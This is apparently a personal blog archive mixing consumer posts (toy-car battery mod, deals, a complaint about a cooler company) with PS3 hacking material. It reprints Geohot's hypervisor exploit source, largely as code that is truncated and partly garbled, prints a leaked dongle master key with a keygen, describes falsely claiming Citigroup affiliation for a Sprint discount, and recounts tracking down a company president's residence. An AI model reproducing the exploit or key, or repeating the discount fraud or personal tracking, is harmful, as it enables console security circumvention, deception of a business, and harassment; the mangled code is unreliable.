12V to 18V Dune Racer Mod Simple

So my son is 4 and the Dune Racer just doesn’t have the same speed appeal to a 4 year old.

I’ve seen others mod their Power Wheels, so I did my research and found the easiest and best way is as follows:

I ordered the following:

2X Batteries “ExpertPower 12v 9ah Sealed Lead Acid Battery with F2 Terminals (.250″) / 2 Pack” $38.00


https://www.amazon.com/gp/product/B01CUXW8HM/ref=oh_aui_detailpage_o04_s01?ie=UTF8&th=1

1X Wiring Harness with Built in 30 Amp. $14.99


http://www.ebay.com/itm/351685021427?_trksid=p2057872.m2749.l2649&ssPageName=STRK%3AMEBIDX%3AIT

Here is the Wire Harness Connector plugged into the Stock battery adapter.


What I did next was get the female F2 connectors and about 5 FT of Red back wire and run it to the 2 batteries in the front compartment.

 

Rockwall Texas – What’s for Dinner

I like to cook. I just hate to clean up afterwards. So I look to break up the week and eat out one night.

Here are my top 3 picks for Rockwall Dining out with kids

Lubys -Wednesdays Eat Free

Kyoto’s -Wednesdays Eat Free

Logans – Wednesdays Eat Free

 

Atlas Cooler Scam

 

So I wanted to vocalize just how upset I am at Atlas Coolers. More importantly Ben Jones the President of Atlas Coolers. The story goes a little like this…..

Prelude: It was June 15th and I was reading through Rokslide Forums when I came across a post about a new company (Atlas Coolers) who was selling knockoffs or what some people suggest a substitute to the already popular insulated coolers like Pelican, RTIC, & Yeti.

I thought to myself, “check into this new company do some research”. But, and there is always a but…  I already have a Yeti, and it is great, really great…. but the damn thing is so heavy when you fill it with ice and drinks.

Not to mention I also have a RTIC Cooler 20Qt hard shell and Softpak. Both of which have their own useful purposes and function. See my collection below:

Some people who read this won’t understand my obsession or any man’s obsession for certain items and I don’t expect you to.  Rational and logic goes out the door when we find toys we want.  I know that my wife doesn’t always get why we need so many different coolers but she has learned to adapt. Each has a purpose for the right moment.

Back to the story: The deal all started here:

http://www.rokslide.com/forums/gear-deals/46044-atlas-cooler-25-discount-buy-june-1-june-30-a-10.html

I did my research and decided I had a use for a new cooler, a different size and shape cooler. So I ordered one on June 18th. The order said to expect shipment in 7 to 10 days. No indication that there was a backlog on the site so I figured it’s just standard processing time.

The next time I checked was July 6th. Approx 15 Days later – I was greeted with a response that the product was delayed and ship the 3rd week of July.  7 Weeks later Eh…

At this point the product had hit some delays. “That’s okay” I thought I could wait a few more weeks. Time went on… and on and on.. no email or update. Fast forward to Present Day and the Summer is almost over. It is now present day, August 31st and no product or announcement from the company when this so called cooler would show up. 12 Weeks and several false stories about why product is delayed from an untrusted source.

I went back to the forums to do some digging into what others might be saying. There is one lone wolf on the forums that claims he has been in contact with Ben. I’ve screenshot that man’s fairy tale of lies. All a hoax to keep the lie going while they probably funnel the money slowly from shopify.

What I found out is that no one has received S*H*I*T from this company. All we have is one lie after another from a guy who claims to be coordinating this heist. I took screenshots below of the long drawn out story of why after 90 days a cooler never appeared. I canceled tonight. Enough waiting.

I have also filed a complaint with the FTC and the BBB because this is the worst kind of company. A company who doesn’t answer to emails, a company who doesn’t communicate to its customers.

 

For those that find this blog please post if you ever get your cooler. Others like myself have started to cancel their orders because hunting season is here. Dove season Started Sept 1st.

 


The Tuesday or Wednesday date would have been 8/23 or 8/24.

Today is 8/31/2016 and there has been no shipment or tracking posted.

Call me crazy but I even managed to locate this asshole’s place of residence. Just to see if he was working out of a PO Box or in the middle of nowhere. And guess what….If you go to Texas Website of Registered companies

https://mycpa.cpa.state.tx.us/coa/coaSearch.do

I found the guy on LinkedIn so I messaged him on Tuesday 9/6/2016

 

So some might still be interested in knowing why I have so many coolers.

The Yeti hardshell was my first Cooler. I learned after a few events that it was not something you carry to a concert unless you have wheels. Hence the red cart.

My second cooler was the Yeti softpak. Nice cooler however, the damn thing scratches your hand pulling anything out of it. After the 6th beverage I was ready to return it but couldn’t because it really was nice to have cool drinks after 5 hours of being in the sun.

My third cooler was the Hard Shell RTIC I got it because it has a handle and is portable without being too heavy when full.  I can sit on it or prop my feet up on it if I am in a lawn chair!

My 4th cooler is the softpak RTIC which probably gets the most use. It solved the dreaded hand issue that the Yeti has. It’s light enough that my wife can carry it since it has a strap and it holds just the right amount of beer. 15 pack of Miller Lite AL bottles fit very nicely.

 

 

 

 

 

 

 

 

BLES01909-[Wolfenstein The New Order EU] to BLUS31220-[Wolfenstein The New Order] Conversion

This game would not play on my PS3 because it is an EU BLES release, so I had to manually hack the game and convert it to US BLUS. Below are the steps that I did to accomplish this.

Rename BLES01909-[Wolfenstein The New Order EU] to BLUS31220-[Wolfenstein The New Order]

Copy these 3 files from the following directories
PS3_GAME/PARAM.SFO
PS3_DISC.SFB
PS3_GAME/LICDIR/LIC.DAT

Open PS3TOOLS (if you do not have it, you will need to download it from ps3tools.aldostools.org)
Open PARAM SFO EDITOR –>
Go into \BLUS31220-[Wolfenstein The New Order]\PS3_GAME\PARAM.SFO
Open PARAM.SFO
Change Title ID from “BLES01909” to “BLUS31220”
Change Title to “Wolfenstein: The New Order”
Save

Open PS3 DISC SFB EDITOR –>
Go into \BLUS31220-[Wolfenstein The New Order]\PS3_DISC.SFB
Open PS3_DISC.SFB
Change BLES01909 to BLUS31220
Save

From PS3TOOLS go to Cheats
OPEN HxD
Go into \BLUS31220-[Wolfenstein The New Order]\PS3_GAME\LICDIR\LIC.DAT
Open LIC.DAT
FIND BLES01909 rewrite to BLUS31220 and save.
(Should be line 00000800)
Save

Move to your media of choice and play. File should start right up and download the update.
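
A read-only check for the steps above, as an added example that is not part of the original post: it parses PARAM.SFO and reports whether PS3_DISC.SFB and LIC.DAT carry the same title ID, which catches a half-finished edit or an inconsistent image. The PARAM.SFO layout used (little-endian header, 16-byte index entries) is the publicly documented one; `build_sfo`, the function names and the sample blobs are constructed for illustration, and the SFB and LIC.DAT stand-ins do not reproduce the real file layouts.

```python
import re
import struct

SFO_MAGIC = b"\x00PSF"
TITLE_ID_RE = re.compile(rb"[A-Z]{4}\d{5}")   # shape of BLES01909 / BLUS31220
FMT_INT32 = 0x0404                            # every other format is a UTF-8 string


def parse_sfo(blob):
    """Parse a PARAM.SFO image into {key: value}; ValueError on malformed input."""
    if len(blob) < 20 or blob[:4] != SFO_MAGIC:
        raise ValueError("bad magic: not a PARAM.SFO")
    _version, key_tab, data_tab, count = struct.unpack_from("<IIII", blob, 4)
    if not (20 + 16 * count <= key_tab <= data_tab <= len(blob)):
        raise ValueError("table offsets out of range")
    params = {}
    for n in range(count):
        key_off, fmt, used, max_len, data_off = struct.unpack_from(
            "<HHIII", blob, 20 + 16 * n)
        key_start = key_tab + key_off
        key_end = blob.find(b"\x00", key_start, data_tab)
        if key_end < 0:
            raise ValueError("unterminated key name")
        data_start = data_tab + data_off
        if used > max_len or data_start + max_len > len(blob):
            raise ValueError("value runs past end of file")
        raw = blob[data_start:data_start + used]
        key = blob[key_start:key_end].decode("ascii")
        if fmt == FMT_INT32:
            if used != 4:
                raise ValueError("bad integer length")
            params[key] = struct.unpack("<I", raw)[0]
        else:
            params[key] = raw.split(b"\x00", 1)[0].decode("utf-8")
    return params


def build_sfo(entries):
    """Build a minimal SFO from {key: str | int}; used only for the sample below."""
    index = keys = data = b""
    for key in sorted(entries):
        value = entries[key]
        if isinstance(value, int):
            fmt, raw = FMT_INT32, struct.pack("<I", value)
        else:
            fmt, raw = 0x0204, value.encode("utf-8") + b"\x00"
        padded = raw + b"\x00" * (-len(raw) % 4)
        index += struct.pack("<HHIII", len(keys), fmt, len(raw), len(padded), len(data))
        keys += key.encode("ascii") + b"\x00"
        data += padded
    keys += b"\x00" * (-len(keys) % 4)
    key_tab = 20 + len(index)
    header = SFO_MAGIC + struct.pack("<IIII", 0x0101, key_tab, key_tab + len(keys), len(entries))
    return header + index + keys + data


def find_title_ids(blob):
    """Return the distinct title-ID-shaped strings found anywhere in a binary blob."""
    return sorted({m.group().decode("ascii") for m in TITLE_ID_RE.finditer(blob)})


def check_title_ids(sfo_blob, other_files):
    """Compare TITLE_ID in PARAM.SFO with the IDs found in each other file.

    Returns (sfo_id, mismatches); mismatches maps file name -> IDs found there
    whenever that list is not exactly [sfo_id] (an empty list means none found).
    """
    sfo_id = parse_sfo(sfo_blob).get("TITLE_ID")
    mismatches = {}
    for name, blob in other_files.items():
        found = find_title_ids(blob)
        if found != [sfo_id]:
            mismatches[name] = found
    return sfo_id, mismatches


# Constructed sample: PARAM.SFO and LIC.DAT already edited, PS3_DISC.SFB missed.
SAMPLE_SFO = build_sfo({"CATEGORY": "DG", "PARENTAL_LEVEL": 5,
                        "TITLE": "Wolfenstein: The New Order", "TITLE_ID": "BLUS31220"})
SAMPLE_SFB = b".SFB" + b"\x00" * 28 + b"TITLE_ID" + b"\x00" * 8 + b"BLES01909" + b"\x00" * 7
SAMPLE_LIC = b"\x00" * 0x800 + b"BLUS31220" + b"\x00" * 7   # ID at offset 0x800, per the post

if __name__ == "__main__":
    sfo_id, bad = check_title_ids(SAMPLE_SFO, {"PS3_DISC.SFB": SAMPLE_SFB, "LIC.DAT": SAMPLE_LIC})
    print("PARAM.SFO TITLE_ID:", sfo_id)
    for name, ids in bad.items():
        print(f"MISMATCH in {name}: found {ids or 'no title ID'}")
```

On real files, read each one with `open(path, "rb").read()` and pass the bytes in place of the samples.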

Discounttiredirect.com $50 Off Black Friday 2011

I have been shopping for some Continental DWS tires for about 3 months for my G8 GT.

I’m glad I have held out this long.

I will use FatWallet’s discount to stack with Black Friday’s $50.00 off to get a really great price on my tires.

http://www.discounttiredirect.com/blackFriday.html

I posted on Slickdeals so rep if you like my find http://slickdeals.net/forums/showthread.php?t=3594702

I haven’t seen anyone else find this link this year!

Mark your calendars, Black Friday 2011 is coming soon! From Thursday, November 24th through Monday, November 28th, 2011 we’re offering a web-only deal that will save you money.

$50 Off a set of 4 tires or 4 wheels
$25 Off a set of 2 tires or 2 wheels
$100 Off a 4 tire and 4 wheel package

• Purchase online and see the savings in your cart instantly.

• Have your tires and wheels shipped directly to your door.

• This offer can be combined with other promotional offers.

Apple iPad 2 purchase

I finally decided to get an Apple iPad 2. I have been looking for the right time to buy for over 60 days and recently I pulled the trigger. Since I am all about getting great deals I figured I would share my final price with the world. Knowing that Apple does not discount its products, especially the iPad 2, I had my work cut out for me. I researched Black Friday to gauge Apple’s likelihood of a sale. Thanks to slickdeals.com I found a post for the iPad 2 w/ an instant discount. Now I took some special circumstances to make this all happen. YMMV.

The breakdown goes like this:
$ 599.00 Apple.com doesn’t include the tax portion.

$ 611.00 Ipad 2 32 gig cost from Buy.com includes shipping
$ (36.01) Instant discount from Buy.com
$ 574.99 Total – Already below apple.com pricing
$ (30.55) 5% Discover cashback confirmed
$ 544.44 Total
$ 0.00 Tax no tax charged * sweet!
$ (57.50) Rakuten Super Points (5,750 or 100 pts = $1.00) 10X bonus when I purchased redeemable Nov 22nd
$ 486.94 Total
$(300.00) Chase promo signed up for chase freedom card
$186.94 Total
$(125.00) Citicard cashback. Cashback sitting there waiting to be spent
$61.94 Grand Total what I paid out of pocket

 

Chase 300.00 freedom CC offer that I used

http://slickdeals.net/forums/showthread.php?t=3459776

 

Sprint 27% Discounts

Corp ID: NADAY_ZZZ = 20% off thru Target.
Corp ID: NACIT_ZZZ= 27% off thru Citigroup.
Sprint 27% Discount thru Citigroup
Step 1 Go to http://www.mail.com and open up a NEW FREE E-Mail address for yourself. From the available addresses use the drop down arrow to view all of them. Choose the one: @post.com and create your own beginning. Example: dltv@post.com

It is free email. Not really sure why you need a POST.com extension email address but just go with it.

Step 2 Go to http://www.Sprint.com and click on the link “Employee Discounts”. Here you will enter the new email address that you created above. It will say you have been approved and an email will be sent to you with instructions.

Typical replies from Sprint are 48 hrs and will look something like the following:

Quote:
Thank you for contacting Sprint.

We have received your request to participate in the NVP Discount
Program through Post.com. Unfortunately, we are unable to process your request to participate in the Program. The company you specified, Post.com, does not appear to be eligible for a discount through Sprint. It may be possible that your company is listed as a part of a larger company. If so, please reply to this e-mail with the name of the main or parent company your company is associated with. This will enable me to apply the discount to your account.

Thank you for choosing Sprint!

Sincerely,
xxxx
Sprint
Just reply to their mail saying that post.com is part of Citigroup, and don’t forget to mention the Corp ID: NACIT_ZZZ; it’s for 27% off.

Next thing you know they reply with an email that looks just like this:
Quote:
Thank you for your reply.

I have updated the 27% employee discount for the employee of Citigroup.
So, you will begin receiving the Citigroup employee discount on the next
invoice. You will get the discount of 27% on all the MRC (Monthly
Recurring Charge) of the services except TEP (Total Equipment
Protection).

Congratulations on taking advantage of your company’s discount with
Sprint, we are excited to have you as a customer.

Thank you for emailing us. It was a pleasure assisting you and I look
forward to more opportunities to serve you in future. Have a great day!

Sincerely,
xxxx
My bill just got discounted for 27%, so it does work folks!!!

Mention Corp ID: NACIT_ZZZ

Everything Data w/Any Mobile, AnytimeSM

Starting at
$51.09
After discount
Reg. $69.99/month

Unlimited calling to any mobile in America
Unlimited Web
Unlimited text and picture messaging
Sprint TV® and Sprint Music
Sprint GPS Navigation
450 Anytime Minutes

$10/mo. Premium Data add-on is required for smartphones. Other monthly charges apply. See below**. Includes 450 Anytime Minutes. Existing Sprint customers can switch Sprint plans without a contract extension. New lines of activation require a new two-year Agreement. Excludes international, roaming and indirect calls.

X3MAX PS3 GIF – is not a fake after all XTSE Creates PS3 Dongle ID Key Generator

I downloaded the compiled version of p3kgwn to see if there was any meaning to X3’s claim. You all remember that GIF image that everyone said was fake and no one could make sense of it. Well, more progress has been made in the PS3 scene and I thought I’d help validate X3max. Thanks go out to Graf_Chokolo + Xtse for their work.

Below is the image and how to use the little app. It appears to be accurate. If you keep reading you will see why this is important.

X3 image deciphered
————–> IMAGE WAS TAKEN FROM X3MAX.COM

Originally Posted by Estx
Well, the master key is out and about now so here’s a convenient little application to generate your dongle id keys.

Straight forward to use.

p3kg – Xtse WINDOWS 2.0 Net Version

Code:
p3kgwn.exe 0xAAAB

Replacing 0xAAAB with whatever device ID you like. http://www.mediafire.com/?oi8yaop8njrmi2n
– download link for now

AFTER I TESTED THE APP IT TURNS OUT TO GIVE THE SAME RESULTS AS X3 CLAIMED.

C:\Users\Jeff\Desktop>p3kgwn 0x3BAD
p3kg (Windows .NET) – Xtse

Master Key
46 DC EA D3 17 FE 45 D8 09 23 EB 97 E4 95 64 10 D4 CD B2 C2

Device ID
3B AD

Device Key
2A 41 C2 93 F8 15 D8 91 65 6D C3 74 6D 0E 33 EC 7B 39 5B 92

A convenient JavaScript version has been made: http://www.teknoconsolas.es/usbdongle/usbdongle.html

Exporting Contacts from Palm Pre to HTC EVO

I just gave up on the Palm Pre. I got the HTC EVO for under 100 bucks after the trade-in of my Palm Pre and a Walmart 100 gift card.
Keep in mind I missed the 99 dollar deal from Amazon.com for the HTC EVO.
My first goal to prep the transition is to get my contacts fully exported and imported.
I found this post and well so far so good.

This is how to get your contacts from your Sprint Palm PRE. You can create a .vcf file to import into most email programs.
• Open phone dialer on PRE or Pixi
• Type ##66623#
• Click on Export
• This creates the export file (.vcf)….The more contacts you have the longer it takes
• Connect your USB cable to the computer and also to the PRE when it prompts you to.
• Click on the USB Drive on your pre to mount to computer
• Once mounted on your computer, open windows explorer and the Palm PRE
• Find the folder called temp and open it (if you don’t find a temp folder, open folder options/view/and choose show hidden files/ then OK)
• You will find a file called PmMigration (this is the vcf file)
• Drag to your documents folder on your computer (PRE Backup folder) if you have one
• Use this file to import your contacts into Gmail, Yahoo, Hotmail or Outlook
• When you’re done Eject your Palm pre or safely remove hardware and then disconnect pre
• You’re done….

Getting them to Gmail.
Follow the instructions in the above, and create the VCF file. Save it somewhere that it can easily be found. Go to Gmail and click on contacts, then in the upper right click on import. Import your VCF file. If it works it will tell you how many contacts it imported.

Once I got them to Gmail, it was easy to get them to Outlook as Gmail has a direct link to transfer contacts to Outlook.

To make this transfer use this link.
http://office.microsoft.com/en-us/outlook-help/transfer-contacts-between-outlook-and-google-gmail-HA010222048.aspx

Hope this works for all of you. This was the only way I was able to get it all to work, and from what I can tell all the contact info went through, including addresses, email and phone numbers.


Thank you for your time,
Heidi Mercer

“I do believe I am making an impact. I know that cancer’s worst enemy is money. It is money that will pay for research. It is money that will provide services for cancer patients. It is money that will eventually find a cure and end the suffering. What I like about Relay is that we raise thousands of dollars, one dollar at a time. If you have a dollar you can fight cancer. There’s nothing greater than that.” M.Starr

“When you think about it, what other choice is there but to hope? We have two options, medically and emotionally: give up, or Fight Like Hell.”
Lance Armstrong

Geohot’s PS3 exploit released 1.26.2010 PS3 HACKED

Geohot’s PS3 Exploit released for download

Geohot has released the exploit that will allow for the PS3 to be hacked. This is what the hacking community has been waiting for. Geohot’s PS3 exploit will have the console hacking scene raving in hours. This is not for the average user; only experienced hackers will be comfortable with this code.

[Quote]

“In the interest of openness, I’ve decided to release the exploit. Hopefully, this will ignite the PS3 scene, and you will organize and figure out how to use this to do practical things, like the iPhone when jailbreaks were first released. I have a life to get back to and can’t keep working on this all day and night.

Please document your findings on the psDevWiki. They have been a great resource so far, and with the power this exploit gives, opens tons of new stuff to document. I’d like to see the missing HV calls filled in, nice memory maps, the boot chain better documented, and progress on a 3D GPU driver. And of course, the search for a software exploit.

This is the coveted PS3 exploit, gives full memory access and therefore ring 0 access from OtherOS. Enjoy your hypervisor dumps. This is known to work with version 2.4.2 only, but I imagine it works on all current versions. Maybe later I’ll write up how it works

Good luck!”

Download Geohot’s PS3 exploit
http://geohotps3.blogspot.com/2010/01/heres-your-silver-platter.html

Download Geohot’s ps3 exploit in zip format

There are 5 files contained in the zip file, two of which are just instructions in the form of a picture and .txt file.

the following are a list of files in the .zip folder

1.pokemehere.jpg
2.run.sh
3.exploit.c
4.makefile
5.instructions.txt

INSTRUCTIONS.TXT includes:
!!EXPLOIT IS FOR RESEARCH PURPOSES ONLY!!

Usage Instructions:

Compile and run the kernel module.

When the “PRESS THE BUTTON IN THE MIDDLE OF THIS” comes on, pulse the line circled in the picture low for ~40ns.
Try this multiple times, I rigged an FPGA button to send the pulse.
Sometimes it kernel panics, sometimes it lv1 panics, but sometimes you get the exploit!!
If the module exits, you are now exploited.

This adds two new HV calls,
u64 lv1_peek(16)(u64 address)
void lv1_poke(20)(u64 address, u64 data)
which allow any access to real memory.

The PS3 is hacked, its your job to figure out something useful to do with it.

http://geohotps3.blogspot.com/

exploit.c
// PS3 exploit code
// c2010 geohot
// I DO NOT CONDONE PIRACY, EXPLOIT IS FOR RESEARCH USE ONLY

#include
#include
#include
#include
#include

#include
#include
#include
#include
#include
#include

#include
#include
#include
#include
#include
#include

#include
#include
#include
#include

#include

void hexdump(unsigned long *d, int l) {
int i;
for(i=0;i>12)&0xFFFFFFFFF;
}

#define LENGTH 0x1000000
#define COUNT 0x40

volatile unsigned long cache_clear[0x100000];

volatile int exploit_first_stage() {
unsigned long lpar, lpar2, crap, g1, glitch=0, status, i;
printk(KERN_ERR "allocate memory: %d\n", lv1_allocate_memory(0x100000, 0x14, 0, 0, &lpar, &crap));
printk(KERN_ERR "PRESS THE BUTTON IN THE MIDDLE OF THIS\n");

for(i=0;i<0x10000;i++) {
g1 = ((unsigned long*)0xD000080080000000)[i*2];
if( (g1 & 1) == 0 || (g1&0xFFFFFFFF00000000) == 0x0000FFFF00000000) {
// isn't valid or is previous crap
if(lv1_write_htab_entry(0,i,0x0000FFFF00000001|(i<<16) | ((((((i/8)^(((0x0000FFFF00000001|(i<>12) & 0x1FFF)) <>23)&0x1F)<<7) ,0x196|lpar) != 0) {
printk(KERN_ERR "bad HTAB write @ %X\n", i);
}
glitch++;
}
}
printk(KERN_ERR "added 0x%X HTAB entries\n", glitch);

volatile register unsigned long j, t1, t2, k, l;

//****************KERNEL CHILL TIME BEGIN****************
unsigned long irq, irq1, flags = 0, stack;
irq = __pa(get_irq_chip_data(20));
irq1 = __pa(get_irq_chip_data(16));
spinlock_t mr_lock = SPIN_LOCK_UNLOCKED;
spin_lock_irqsave(&mr_lock, flags);
preempt_disable();
lock_kernel();
hard_irq_disable();
lv1_configure_irq_state_bitmap(1,0,0);
lv1_configure_irq_state_bitmap(1,1,0);
//****************KERNEL CHILL TIME BEGIN****************

// get craps in the icache
lv1_allocate_memory(0x1000, 0xC, 0, 0, &lpar2, &crap);
lv1_release_memory(lpar2);

for(j=0;j<LENGTH;j++) {
if(j==(LENGTH/2)) {
t1 = mftb();
status = lv1_release_memory(lpar);
t2 = mftb();
memset(cache_clear, 0xAA, 0x100000);
}
}

//****************KERNEL CHILL TIME END****************
lv1_configure_irq_state_bitmap(1,1,irq1);
lv1_configure_irq_state_bitmap(1,0,irq);
__hard_irq_enable();
unlock_kernel();
preempt_enable();
spin_unlock_irqrestore(&mr_lock, flags);
//****************KERNEL CHILL TIME END****************

printk(KERN_ERR "time was 0x%lx, 0x%x per, %d\n", t2-t1, (t2-t1)/glitch, status);

t1 = 0;
t2 = 0;

for(i=0;i0) {
printk(KERN_ERR "EXPLOIT ENTRY FOUND!!!!!\n");
return 0;
}

return -1;
}

unsigned long SLB[128];

// 64 entries in the SLB
inline int read_slb() {
unsigned long i, j;
unsigned long *entry;
for(i=0;i<64;i++) {
entry = &SLB[i*2];
__asm__ volatile("slbmfee 3, %0\n"
"std 3, 0(%1)\n"
"slbmfev 3, %0\n"
"std 3, 8(%1)\n"
:
: "r" (i), "r" (entry)
: "r3");
}
return 0;
}

// move into another virtual address space

unsigned long HTAB_0[0x20000];
unsigned long HTAB_1[0x20000];

volatile long hypercall_in_c() {
return 0x8FFFFFFEF;
}

volatile long call_hypercall_tlbia(unsigned long* r4) {
unsigned long ret;
unsigned long inr4 = *r4, outr4;
asm volatile("mr 3, %2\n"
"li 11, 16\n"
"sc 1\n"
"mr %0, 3\n"
"mr %1, 4\n"
: "=r" (ret), "=r" (outr4)
: "r" (inr4)
: "r3", "r4", "r5", "r6", "r7", "r8", "r9", "r10", "r11", "r12" );
*r4 = outr4;
return ret;
}

volatile int exploit_second_stage() {
unsigned long crap, j, slb1, slb2, msr, hsprg0;
unsigned long i, g1, g2, status, raff_ptr;
unsigned long vas_id, old_vas_id;
unsigned long act_htab_size;
//2, (24<<56)|(16<<48)
printk(KERN_ERR "construct address space: %d\n", lv1_construct_virtual_address_space(20, 2, 0x1814000000000000, &vas_id, &act_htab_size));
lv1_get_virtual_address_space_id_of_ppe(0, &old_vas_id);
printk(KERN_ERR "address space is %d, old was %d\n", vas_id, old_vas_id);
if(vas_id == 0) {
printk(KERN_ERR "ADDRESS SPACE FAIL\n");
return 0;
}

read_slb();
for(i=0;i>27)&1) {
printk(KERN_ERR “%lx %lx\n”, SLB[i*2]&0xFFFFFFFFF0000000, SLB[(i*2)+1]>>12);
}
}
//hexdump(SLB, 128);

unsigned long htab_lpar;
lv1_map_htab(0, &htab_lpar);
unsigned long htab_ra = get_real_address_from_lpar(htab_lpar);

unsigned long other_htab_lpar;
lv1_map_htab(vas_id, &other_htab_lpar);
unsigned long* other_htab = __ioremap(other_htab_lpar, 0x100000, 3);
unsigned long other_htab_ra = get_real_address_from_lpar(other_htab_lpar);

printk(KERN_ERR "fix values are %lx %lx\n", other_htab_lpar, vas_id);

// add the messed up one
for(raff_ptr=0;raff_ptr>12) == 0x400) ) {
printk(KERN_ERR "FOUND ENTRY %16.16lx %16.16lx @ %X\n", g1, g2, raff_ptr);
break;
}
}
if(raff_ptr==0x10000) {
printk(KERN_ERR "EXPLOIT NOT FOUND\n");
goto hard_die;
}

if(other_htab_ra != ((g2&0xFFFF000)>>12) ) {
printk(KERN_ERR "BAD ADDRESS OF REGIONS HTAB\n");
goto die;
}

// add the segment
crap = 0x5000000000000000;
__asm__ volatile("slbie %0\n"
:
: "r" (crap) );

read_slb();
for(j=0;j>27)&1) == 0) {
break;
}
}
// j is first SLB I can use
slb1 = 0x5000000008000000|j;
//slb2 = 0x0000FFFF00000400|(raff_ptr<>12) & 0x1FFF)) <>2)&1)?24:12);
printk(KERN_ERR "computed VA is %lx\n", va);

unsigned long* other_htab_rw = va;
other_htab_rw[0] = 0x0000FFFF00000001;
other_htab_rw[1] = 0x0000000000000196|(htab_ra< %lx\n”, usb1_ra);
printk(KERN_ERR "0x4000001e0000 -> %lx\n", usb2_ra);
printk(KERN_ERR "0x4000001f0000 -> %lx\n", usb3_ra);
printk(KERN_ERR "0x400000200000 -> %lx\n", usb4_ra);

// skip first entry, it’s mine and important
for(i=1;i<0x10000;i++) {
g1 = ((unsigned long*)0xD000080080000000)[i*2];
g2 = ((unsigned long*)0xD000080080000000)[(i*2)+1];
if(g1&1) {
unsigned long va = 0xFFFFFFFFFFFFFFFF, ra;
for(j=0;j>27)&1) {
if((SLB[(j*2)+1]>>12) == (g1>>12)) {
va = SLB[j*2]&0xFFFFFFFFF0000000;
}
}
}
if(va == 0xFFFFFFFFFFFFFFFF) {
continue;
//printk(KERN_ERR "ENTRY NOT FOUND IN SLB: %lx\n", (g1>>12));
}
valid_count++;

va |= ((i/8)^((g1>>(7+5)) & 0x1FFF)) <>2)&1)?24:12);
ra = g2 >> 12;

my_lpar = 0xFFFFFFFFFFFFFFFF;

if( ra >= 0x1000 && ra = 0x8000 ) {
my_lpar = (ra-0x8000) << 12;
} else {
my_lpar = 0x6c0058000000 | ((ra-0x1000)<<12);
}
} else if( (ra&0xFFFFFFFFFFFFFF00) == htab_ra) {
my_lpar = htab_lpar + ((ra-htab_ra) << 12);
} else if( (ra&0xFFFFFFFFFFFFFF00) == other_htab_ra) {
my_lpar = other_htab_lpar + ((ra-other_htab_ra) <= 0x28000080 && ra %lx\n”, i, g1, g2, va, ra);
}

if(other_htab[i*2] != g1 || other_htab[(i*2)+1] != g2) {
printk(KERN_ERR "verify failed on %X\n", i);
printk(KERN_ERR "%lx %lx — %lx %lx\n", g1, g2, other_htab[i*2], other_htab[(i*2)+1]);
//goto home;
}
}
}

printk(KERN_ERR "wrote 0x%X/0x%X htab entries\n", count, valid_count);

hexdump(other_htab, 4);
printk(KERN_ERR "OOO R/W\n");
hexdump(other_htab_rw, 4);

// add the segment different
crap = 0x5000000000000000;
__asm__ volatile("slbie %0\n"
:
: "r" (crap) );

read_slb();
for(j=0;j>27)&1) == 0) {
break;
}
}
// j is first SLB I can use
slb1 = 0x5000000008000000|j;
slb2 = 0x0000FFFF00000400;
__asm__ volatile("slbmte %0, %1\n"
:
: "r" (slb2), "r" (slb1) );

printk(KERN_ERR "GOING UNDERCOVER\n");

//****************KERNEL CHILL TIME BEGIN****************
unsigned long irq, irq1, flags = 0;
irq = __pa(get_irq_chip_data(20));
irq1 = __pa(get_irq_chip_data(16));
spinlock_t mr_lock = SPIN_LOCK_UNLOCKED;
spin_lock_irqsave(&mr_lock, flags);
preempt_disable();
lock_kernel();
hard_irq_disable();
lv1_configure_irq_state_bitmap(1,0,0);
lv1_configure_irq_state_bitmap(1,1,0);
//****************KERNEL CHILL TIME BEGIN****************

status = lv1_select_virtual_address_space(vas_id);

// OMG, CRAZY, IN OTHER SPACE
unsigned long* htab_rw = 0x5000000000000000;
// middle part is 0 cause in position 0

// add htab r/w to itself
htab_rw[2] = 0x0000FFFF00000005;
htab_rw[3] = 0x0000000000000196;

lv1_select_virtual_address_space(old_vas_id);
//****************KERNEL CHILL TIME END****************
lv1_configure_irq_state_bitmap(1,1,irq1);
lv1_configure_irq_state_bitmap(1,0,irq);
__hard_irq_enable();
unlock_kernel();
preempt_enable();
spin_unlock_irqrestore(&mr_lock, flags);
//****************KERNEL CHILL TIME END****************

printk(KERN_ERR "prease i lived?!?!?: %d\n", status);

// add the segment different again
crap = 0x5000000000000000;
__asm__ volatile("slbie %0\n"
:
: "r" (crap) );

read_slb();
for(j=0;j>27)&1) == 0) {
break;
}
}
// j is first SLB I can use
slb1 = 0x5000000008000000|j;
slb2 = 0x0000FFFF00000500;
__asm__ volatile("slbmte %0, %1\n"
:
: "r" (slb2), "r" (slb1) );

home:
printk(KERN_ERR "unmap other HTAB: %d\n", lv1_unmap_htab(other_htab_lpar));
printk(KERN_ERR "destruct address space: %d\n", lv1_destruct_virtual_address_space(vas_id));

hexdump(0xD000080080000000, 0x10);

return 0;
die:
printk(KERN_ERR "unmap other HTAB: %d\n", lv1_unmap_htab(other_htab_lpar));
printk(KERN_ERR "destruct address space: %d\n", lv1_destruct_virtual_address_space(vas_id));
return -1;
hard_die:
printk(KERN_ERR "unmap other HTAB: %d\n", lv1_unmap_htab(other_htab_lpar));
printk(KERN_ERR "destruct address space: %d\n", lv1_destruct_virtual_address_space(vas_id));
return -2;
}

void add_segment() {
// add the segment different again
unsigned long crap, j, slb1, slb2;
crap = 0x5000000000000000;
__asm__ volatile("slbie %0\n"
:
: "r" (crap) );

read_slb();
for(j=0;j>27)&1) == 0) {
break;
}
}
// j is first SLB I can use
slb1 = 0x5000000008000000|j;
slb2 = 0x0000FFFF00000500;
__asm__ volatile("slbmte %0, %1\n"
:
: "r" (slb2), "r" (slb1) );
}

volatile long lv1_peek(unsigned long real_addr) {
unsigned long ret;
asm volatile("mr 3, %1\n"
"li 11, 16\n"
"sc 1\n"
"mr %0, 3\n"
: "=r" (ret)
: "r" (real_addr)
: "r3", "r4", "r5", "r6", "r7", "r8", "r9", "r10", "r11", "r12");
return ret;
}

volatile long lv1_poke(unsigned long real_addr, unsigned long data) {
unsigned long ret;
asm volatile("mr 4, %2\n"
"mr 3, %1\n"
"li 11, 20\n"
"sc 1\n"
"mr %0, 3\n"
: "=r" (ret)
: "r" (real_addr), "r" (data)
: "r3", "r4", "r5", "r6", "r7", "r8", "r9", "r10", "r11", "r12");
return ret;
}

void install_hypercall() {
unsigned long lpar, crap;

hexdump(0xD000080080000000, 0x10);

if( *((unsigned long *)0xD000080080000010) != 0x0000FFFF00000005 ||
*((unsigned long *)0xD000080080000018) != 0x0000000000000196) {
printk(KERN_ERR "killer entry NOT present\n");
return 0;
}

